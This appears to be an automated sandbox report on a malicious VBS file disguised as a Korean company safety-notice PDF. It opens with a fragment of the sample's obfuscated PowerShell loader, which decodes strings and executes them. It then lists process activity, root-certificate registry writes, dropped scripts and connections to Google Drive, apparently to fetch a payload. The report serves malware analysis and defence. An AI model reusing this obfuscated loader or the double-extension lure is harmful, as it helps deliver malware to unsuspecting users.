Taageroselvporm,eminereOrdlistdGrundst+G.seous+Unschol%,reyfly$Erudit,VTekstbeiKileskrrStopklogMirdscuiBlufrdinI,dhsteaBankerolSerenesl Exc,mmyEpicond.He.skabcLigasedoSnogehau machinn Deprivt Gabrie ') ;$Cargoliner=$Virginally[$Walkene];}Dentagra176 (Rekordjagt ' gascon$Bowlin,gL.ndkralPikketroSi imidb S,stemaBihulerlBedro.v:ragaersGUnpala.eRe,otednFrontoon BoligseBasketkmRdligs.rEm.ergeykildlumsOuttel.t minisyeUdpantntKulstof Opgoere=epil ch flawynuG .remfueAfm,grit Tytteb- BusrejCInoffenoGalinsonBubblelt UdvaeleArvem tnLimfabrtinsipid Br.gtfl$HavkattOTrachymbbeseemslDiphycei nwithgcoagu aaDecnetatPersistiNon.enuoatomiesn CiliassAflyssdrPaasknneVelve ptAnnoncetDispatee,ykelbunTrykmaasBjer ni ');Dentagra176 (Rekordjagt 'Chanc,a$Cytoplag Scu.lel Arianio coadapbViaduktaRem mbelUltra o:SendebuSFlersidhHeirleseImposanl Hoved l AntelapCoordinoUnprodut Triole Orbb.gr=Th,esub Stann,r[Um eledSfo drveyMinglinsYau snvtRe eptpeObservemAntipro. postaCSpildevoRafflesnGummyinvSyntakseRecleanrT xifyitFortrol]Dagsbef: Mia,ss:Li ieteFmissilfrGoddampoRm rsskmBinde,tBHandelsaSliderssPr,tosueSjalern6Fragmen4S.ovskaSmaltf.btFalklanrUudholdiTostaven Poonacg.rstatn(Beskytt$ BruserG Hnder.ePennysinEluat.dnBoblekae Fornemm Baandsr Forms yFodsveds riticatGaffelte feudaltUdludei)Unjusti ');Dentagra176 (Rekordjagt 'hommos,$Banefulg PerconlNonbrutoTilbagebPatr nia WaspnelAcaulou:HaandgrS ,lokbecMarengsrWeb tedaSlightewforlag.l Bvelsee revendrSto,tilsolivene Superma=Cor cob Viruci[ ObteneSCarmi iy IaomalsForcipatDeck.nge HydropmF.ldblo.SalvninTEsmarale Eph dsxTran,ort Kolleg. UdbudsEAnalysenve stancGainsaioCyborgsdTransfoiCounternMicrophg Smi hc]Vital t:P,ospho: .abellA PhaseaSMisfaitC ArbejdIFilipsgIG yceri.UnfavouGTroubleeMoto istsatir sS PolymetJulef,srLiniestiSy.sttynRataplagTil,rop(Sandkas$ Acce eSSudsmenh CymbideHirsti lPedagoglRhe.usnpJ risdiokundeaftTanekah) Vaagne ');Dentagra176 (Rekordjagt 'plancie$DynamitgThisllplPhascoloLunulaebUnder laClearehlb kldni:FllenesSAfskrkktAkutfunaNedska,tInterplicanop.cs s ndort,akshisi LgnernkPolemarpSensortrForsumpoAarligegDeckelsrDruideraLyknsknmGteskab2Spunkle6doerene=.yvinsa$TanzaniSCrzettec A.abolrBalanopaMisusedwUfordellForhippeDivisi rR,condis Paa ag.Udsendis HematouGaardrybColliersTraffictUvsentlr UrningiCi,ratenAshiestg Sumlog(Monstrs2Fourche9Deu,obr9 Phrase6Advoka,0Klukkes9 Uncial,D,ddelp3Dorritu0Ra.ioli1Recap t5 Filmsp6Ac tylb) Hjrnes ');Dentagra176 $Statistikprogram26;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3992"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\(전사공지용) 24년 안전작업허가 기준 안내 (240415)·pdf.vbs"C:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
19 223
Read events
19 092
Write events
101
Delete events
30

Modification events

(PID) Process:(3992) wscript.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3992) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
Operation:delete valueName:9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Value:
(PID) Process:(3992) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation:writeName:Blob
Value:
0F00000001000000200000009065F32AFC2CFEA7F452D2D6BE94D20C877EFC1C05433D9935696193FDCC05D80300000001000000140000009F6134C5FA75E4FDDE631B232BE961D6D4B97DB6200000000100000047030000308203433082022BA00302010202147327B7C17D5AE708EF73F1F45A79D78B4E99A29F300D06092A864886F70D01010B05003031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C084469676943657274301E170D3233303932393130353030335A170D3339303530383130353030335A3031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C08446967694365727430820122300D06092A864886F70D01010105000382010F003082010A0282010100D91B7A55548F44F3E97C493153B75B055695736B184640D7335A2E6218083B5A1BEE2695209350E57A3EB76FBC604CB3B250DF3D9D0C560D1FBDFE30108D233A3C555100BE1A3F8E543C0B253E06E91B6D5F9CB3A093009BC8B4D3A0EB19DB59E56DA7E3D637847970D6C2AEB4A1FCF3896A7C080FE68759BAA62E6AAA8B7C7CBDA176DDC72F8D259A16D3469E31F19D2959904611D730D7D26FCFED789A0C49698FDFABF3F6727D08C61A073BB11E85C96486D49B0E0D38364C008A5EB964F8813C5DF004F9E76D2F8DB90702D800032674959BF0DF823785419101CEA928A10ACBAE7E48FE19202F3CB7BCF416476D17CB64C5570FCED443BD75D9F2C632FF0203010001A3533051301D0603551D0E041604145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7301F0603551D230418301680145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7300F0603551D130101FF040530030101FF300D06092A864886F70D01010B05000382010100AF2218E4CA18144728FCC76EA14958061522FD4A018BED1A4BFCC5CCE70BC6AE9DF7D3795C9A010D53628E2B6E7C10D6B07E53546235A5EE480E5A434E312154BF1E39AAC27D2C18D4F41CBBECFE4538CEF93EF62C17D187A7F720F4A9478410D09620C9F8B293B5786A5440BC0743B7B7753CF66FBA498B7E083BC267597238DC031B9BB131F997D9B8164AAED0D6E328420E53E1969DA6CD035078179677A7177BB2BF9C87CF592910CD380E8501B92040A39469C782BA383BEAE498C060FCC7C429BC10B7B6B7A0659C9BE03DC13DB46C638CF5E3B22A303726906DC8DD91C64501EBFC282A3A497EC430CACC066EE4BF9C5C8F2F2A05D0C1921A9E3E85E3
(PID) Process:(3992) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation:delete valueName:File
Value:
(PID) Process:(3992) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation:delete keyName:(default)
Value:
(PID) Process:(3992) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation:writeName:Blob
Value:
1400000001000000140000005D6CA352CEFC713CBBC5E21F663C3639FD19D4D70300000001000000140000009F6134C5FA75E4FDDE631B232BE961D6D4B97DB6200000000100000047030000308203433082022BA00302010202147327B7C17D5AE708EF73F1F45A79D78B4E99A29F300D06092A864886F70D01010B05003031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C084469676943657274301E170D3233303932393130353030335A170D3339303530383130353030335A3031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C08446967694365727430820122300D06092A864886F70D01010105000382010F003082010A0282010100D91B7A55548F44F3E97C493153B75B055695736B184640D7335A2E6218083B5A1BEE2695209350E57A3EB76FBC604CB3B250DF3D9D0C560D1FBDFE30108D233A3C555100BE1A3F8E543C0B253E06E91B6D5F9CB3A093009BC8B4D3A0EB19DB59E56DA7E3D637847970D6C2AEB4A1FCF3896A7C080FE68759BAA62E6AAA8B7C7CBDA176DDC72F8D259A16D3469E31F19D2959904611D730D7D26FCFED789A0C49698FDFABF3F6727D08C61A073BB11E85C96486D49B0E0D38364C008A5EB964F8813C5DF004F9E76D2F8DB90702D800032674959BF0DF823785419101CEA928A10ACBAE7E48FE19202F3CB7BCF416476D17CB64C5570FCED443BD75D9F2C632FF0203010001A3533051301D0603551D0E041604145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7301F0603551D230418301680145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7300F0603551D130101FF040530030101FF300D06092A864886F70D01010B05000382010100AF2218E4CA18144728FCC76EA14958061522FD4A018BED1A4BFCC5CCE70BC6AE9DF7D3795C9A010D53628E2B6E7C10D6B07E53546235A5EE480E5A434E312154BF1E39AAC27D2C18D4F41CBBECFE4538CEF93EF62C17D187A7F720F4A9478410D09620C9F8B293B5786A5440BC0743B7B7753CF66FBA498B7E083BC267597238DC031B9BB131F997D9B8164AAED0D6E328420E53E1969DA6CD035078179677A7177BB2BF9C87CF592910CD380E8501B92040A39469C782BA383BEAE498C060FCC7C429BC10B7B6B7A0659C9BE03DC13DB46C638CF5E3B22A303726906DC8DD91C64501EBFC282A3A497EC430CACC066EE4BF9C5C8F2F2A05D0C1921A9E3E85E3
(PID) Process:(3992) wscript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation:writeName:Blob
Value:
190000000100000010000000BCC80DAA2F98A4692805BFF4CBB372EB0300000001000000140000009F6134C5FA75E4FDDE631B232BE961D6D4B97DB6200000000100000047030000308203433082022BA00302010202147327B7C17D5AE708EF73F1F45A79D78B4E99A29F300D06092A864886F70D01010B05003031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C084469676943657274301E170D3233303932393130353030335A170D3339303530383130353030335A3031310B3009060355040613025553310F300D06035504080C06426F73746F6E3111300F060355040A0C08446967694365727430820122300D06092A864886F70D01010105000382010F003082010A0282010100D91B7A55548F44F3E97C493153B75B055695736B184640D7335A2E6218083B5A1BEE2695209350E57A3EB76FBC604CB3B250DF3D9D0C560D1FBDFE30108D233A3C555100BE1A3F8E543C0B253E06E91B6D5F9CB3A093009BC8B4D3A0EB19DB59E56DA7E3D637847970D6C2AEB4A1FCF3896A7C080FE68759BAA62E6AAA8B7C7CBDA176DDC72F8D259A16D3469E31F19D2959904611D730D7D26FCFED789A0C49698FDFABF3F6727D08C61A073BB11E85C96486D49B0E0D38364C008A5EB964F8813C5DF004F9E76D2F8DB90702D800032674959BF0DF823785419101CEA928A10ACBAE7E48FE19202F3CB7BCF416476D17CB64C5570FCED443BD75D9F2C632FF0203010001A3533051301D0603551D0E041604145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7301F0603551D230418301680145D6CA352CEFC713CBBC5E21F663C3639FD19D4D7300F0603551D130101FF040530030101FF300D06092A864886F70D01010B05000382010100AF2218E4CA18144728FCC76EA14958061522FD4A018BED1A4BFCC5CCE70BC6AE9DF7D3795C9A010D53628E2B6E7C10D6B07E53546235A5EE480E5A434E312154BF1E39AAC27D2C18D4F41CBBECFE4538CEF93EF62C17D187A7F720F4A9478410D09620C9F8B293B5786A5440BC0743B7B7753CF66FBA498B7E083BC267597238DC031B9BB131F997D9B8164AAED0D6E328420E53E1969DA6CD035078179677A7177BB2BF9C87CF592910CD380E8501B92040A39469C782BA383BEAE498C060FCC7C429BC10B7B6B7A0659C9BE03DC13DB46C638CF5E3B22A303726906DC8DD91C64501EBFC282A3A497EC430CACC066EE4BF9C5C8F2F2A05D0C1921A9E3E85E3
(PID) Process:(3992) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3992) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3992) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
Executable files
0
Suspicious files
16
Text files
2
Unknown types
3

Dropped files

PID
Process
Filename
Type
3992wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506compressed
MD5:
SHA256:
3992wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:
SHA256:
3992wscript.exeC:\Users\admin\AppData\Local\Temp\Cab213F.tmpcompressed
MD5:
SHA256:
3992wscript.exeC:\Users\admin\AppData\Local\Temp\Tar2140.tmpcat
MD5:
SHA256:
3992wscript.exeC:\Users\admin\AppData\Local\Temp\Miljforstyrrelsen.txttext
MD5:
SHA256:
2856powershell.exeC:\Users\admin\AppData\Local\Temp\wfgozhwb.hef.ps1binary
MD5:
SHA256:
2856powershell.exeC:\Users\admin\AppData\Local\Temp\jjou1dpt.a3w.psm1binary
MD5:
SHA256:
2856powershell.exeC:\Users\admin\AppData\Roaming\Irreplaceableness.Suctext
MD5:
SHA256:
2072powershell.exeC:\Users\admin\AppData\Local\Temp\niawd11v.1dm.ps1binary
MD5:
SHA256:
2072powershell.exeC:\Users\admin\AppData\Local\Temp\0t2heobb.urd.psm1binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
12
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1900
wab.exe
GET
200
142.250.186.35:80
http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D
US
binary
724 b
unknown
1900
wab.exe
GET
304
23.32.238.201:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6578879dcf199db3
DE
unknown
3992
wscript.exe
GET
200
23.32.238.219:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?10f9d6e8c9bbb863
DE
compressed
68.3 Kb
unknown
1900
wab.exe
GET
200
142.250.186.35:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
US
binary
1.41 Kb
unknown
1080
svchost.exe
GET
304
23.32.238.219:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3e412f7b4eff0943
DE
unknown
1900
wab.exe
GET
200
142.250.186.35:80
http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQCs1z%2BNuYt%2ByxDDkVqEYek%2F
US
binary
472 b
unknown
1900
wab.exe
GET
200
142.250.186.35:80
http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQCb04uMpoGrFRCW8s8fxxYV
US
binary
472 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
224.0.0.252:5355
unknown
3992
wscript.exe
23.32.238.219:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
unknown
1080
svchost.exe
224.0.0.252:5355
unknown
2856
powershell.exe
216.58.206.78:443
drive.google.com
GOOGLE
US
whitelisted
2856
powershell.exe
142.250.181.225:443
drive.usercontent.google.com
GOOGLE
US
whitelisted
1900
wab.exe
216.58.206.78:443
drive.google.com
GOOGLE
US
whitelisted
1900
wab.exe
23.32.238.201:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
unknown
1900
wab.exe
142.250.186.35:80
ocsp.pki.goog
GOOGLE
US
whitelisted

DNS requests

Domain
IP
Reputation
ctldl.windowsupdate.com
  • 23.32.238.219
  • 23.32.238.226
  • 23.32.238.201
  • 23.32.238.208
whitelisted
drive.google.com
  • 216.58.206.78
shared
drive.usercontent.google.com
  • 142.250.181.225
unknown
ocsp.pki.goog
  • 142.250.186.35
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
(전사공지용) 24년 안전작업허가 기준 안내 (240415)·pdf.vbs